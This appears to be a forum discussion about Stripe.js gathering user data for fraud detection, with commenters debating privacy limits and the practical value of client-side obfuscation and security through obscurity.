Is this view conditional on the type of data Stripe is currently collecting or would it apply to any data Stripe collects? Would this be true if Stripe began recording every keystroke in the app and hooked every XHR request to my backend server and sent copies to Stripe?
I agree that Stripe has a sensible reason for using this data. If I started seeing a high rate of chargebacks, I'd consider enabling Stripe on more parts of my site so that Stripe could consume user behavior earlier on to detect fraud.
My issue is that if there's no agreement about what data Stripe is allowed to collect and what their retention policies are, then the implicit agreement is that Stripe can just collect anything it has access to and hold it forever.
As JavaScript running on my page, Stripe.js has access to basically all user data in my app. There are certain types of user data I would not be comfortable sharing with Stripe, even if it improved fraud detection, so I'd like there to be clear limits on what they're gathering.
It's a library everyone can technically analyze, yes, but by 1) using ever-changing obfuscation that requires a lot of work to RE, and 2) constantly changing the client-side logic itself, it makes the work of the adversaries a lot harder and more tedious, and means either fewer of them will consistently succeed, or more of them will be forced to become more centralized around solutions/services that've successfully solved it, which means Stripe can focus-fire their efforts a bit more.
Of course there's also a lot going on on the backend that'll never be seen, but the adversary is trying to mimic a legitimate user as much as they can, so if the JavaScript is totally unobfuscated and stays the same for a while, it's a lot easier for them to consistently trace exactly what data is being sent and compare it against what their system or altered browser is sending.
It's cat-and-mouse across many dimensions. In such adversarial games, obscurity actually can and often does add some security. "Security by obscurity is no security at all" isn't exactly a fallacy, but it is a fallacy to apply it universally and with a very liberal definition of "security". It's generally meant for things that are more formal or provable, like an encryption or hashing algorithm or other cryptography. It's still totally reasonable to use obscurity as a minor practical measure. I'd agree with this part of https://en.wikipedia.org/wiki/Security_through_obscurity: "Knowledge of how the system is built differs from concealment and camouflage. The efficacy of obscurity in operations security depends by whether the obscurity lives on top of other good security practices, or if it is being used alone. When used as an independent layer, obscurity is considered a valid security tool."
For example, configuring your web server to not display its version on headers or pages is "security by obscurity", and certainly will not save you if you're running a vulnerable version, but may buy you some time if a 0-day comes out for your version and people search Shodan for the vulnerable version numbers - your site won't appear in the list. These kinds of obscurity measures of course never guarantee security and should be the very last line of defense in front of true security measures, but they can still potentially help you a little.
In the "malware vs. anti-virus" and "game cheat vs. game cheat detection software" fights that play out every day, both sides of each heavily obfuscate their code and the actions they perform. No, this never ensures it won't be fully reverse engineered. And the developers all know that. Given enough time and dedication, it'll eventually happen. But it requires more time and effort, and each time it's altered, it requires a re-investment of that time and effort.
Obfuscation and obscurity is arguably the defining feature and "value proposition" of each of those four types of software. A lot of that remains totally hidden on the backend (e.g. a botnet C2 web server only responding with malware binaries if they analyze the connection and believe it really is a regular infected computer and not a security researcher or sandbox), but a lot is also present in the client.
Most of your examples are quite low-level, but it's much harder to keep things hidden within the constraints of the browser sandbox when you have to interface with standard APIs which can be easily instrumented.
I haven't analyzed it and can't say this with any certainty, but my guess is that you're probably right: they're focusing primarily on backend analysis and ML comparing activity across a massive array of customers. This is different from smaller security firms who have a lot less data due to fewer customers, and a kind of sampling bias of customers who are particularly worried about or inundated by fraud.
They may be less interested in suspicious activity or fingerprinting at the device level and more interested in it at the payment and personal information level (which is suggested by articles like https://stripe.com/radar/guide).
Pure, uninformed speculation, but it's possible that if they get deeper into anti-fraud in the future (perhaps if fraudsters get smarter about this higher layer of evasion), they might supplement the data science / finance / payment oriented stuff with more lower-level device and browser analysis, in which case I wouldn't be surprised if they eventually separate out some of the anti-fraud/security parts into an obfuscated portion. (Or, more likely, have Stripe.js load that portion dynamically. Maybe they're already doing this, even? Dunno.)